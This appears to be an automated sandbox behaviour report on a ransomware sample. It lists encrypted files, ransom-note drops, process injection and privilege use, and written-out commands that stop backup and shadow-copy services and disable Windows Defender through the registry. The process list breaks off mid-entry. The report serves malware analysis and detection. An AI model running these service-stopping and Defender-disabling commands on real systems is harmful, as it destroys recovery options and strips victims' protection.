File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\FreeCell\Goal_7.jpg C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-36.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ppd.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_wvUsnGebhz40.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ro\msipc.dll.mui.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_tE1h17QVtMs0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_-_HS7GWYlfw0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_Vrv7wWnNw400.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_K_COL.HXK.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_KQvVeO5VBSw0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-24_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\iq_60x42.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-96_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\commoneffects.respack C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_SJKjiktM3Ko0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\et.txt.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_5nlfuxSw0NM0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-pl.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_qU9RjIGOuA40.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnssci.dll.mui C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_cBWX7Rp_DaA0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_RLyM7WhFzcE0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_gameDVR.targetsize-48.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msadcer.dll.mui.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_GKfBMYJ7vrA0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_kYKM4n8iRio0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\MapsSplashScreen.scale-125.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3328 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1816 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1816 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1816 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3408 wrote to memory of 3340 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3408 wrote to memory of 3340 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3408 wrote to memory of 3340 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1912 wrote to memory of 4272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1912 wrote to memory of 4272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1912 wrote to memory of 4272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 4180 wrote to memory of 816 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4180 wrote to memory of 816 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4180 wrote to memory of 816 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 4332 wrote to memory of 4420 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4332 wrote to memory of 4420 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4332 wrote to memory of 4420 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 4296 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4296 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4296 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3208 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3208 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3208 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1800 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1800 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1800 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 612 wrote to memory of 844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_13048" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13048" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_13048" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

